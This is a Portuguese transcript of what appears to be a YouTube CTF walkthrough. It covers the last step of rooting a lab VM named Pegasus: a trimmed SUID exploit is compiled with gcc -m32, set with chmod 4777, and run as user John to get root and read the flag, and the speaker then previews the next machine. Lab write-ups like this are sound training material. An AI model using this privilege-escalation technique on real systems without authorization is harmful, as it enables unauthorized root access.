poder funcionar certinho, beleza? Então aqui agora a gente compila ele, gcc o suid, vou chamar de suid mesmo, suid.c. Não esquece de compilar com -m32, porque aqui o sistema aqui, ó, ele é 32 bits, tá? Eu tirei tudo aquelas outras partes aqui do exploit, deixei só um system bem sh mesmo, né? Bem simplão aqui. Vamos compilar esse cara, M32, né? Beleza, ele compilou aqui, ó, sudo cp suid pro Pegasus, cd Pegasus. Agora a gente pega, nesse suid aqui, a gente tem que dar um sudo chmod 4777 pro suid, para a gente poder executar ele aqui com o usuário John. Suid. Então agora a gente conseguiu aqui o nosso usuário root, ó, cd/root cat flag. Beleza, essa máquina foi bem chatinha de fazer, né? Bem difícil aí de conseguir explorar a parte do meio dela aí. Só tive problema com a chave do SSH aqui, porque eu já tinha gerado uma chave aí. Eu tinha apagado o authorized keys lá e a hora que eu voltei deu erro. Mas enfim, espero que vocês estejam gostando, pessoal. Amanhã é a última máquina e amanhã a máquina vai ser bem mais difícil que todas as outras que a gente já fez. Então, essa máquina aí é bem complicadinha, né? É o Bray Pain, né? Bray Pain. Vai dar pane na cabeça de todo mundo aí. Não esqueçam de se inscrever aqui no canal, tá? Aqui na descrição tá todos os links de material de apoio para esse vídeo que a gente fez agora. E tá o link da VM de amanhã também. Se alguém precisar de alguma coisa, manda mensagem lá no grupo. É isso aí, valeu galera. Obrigado.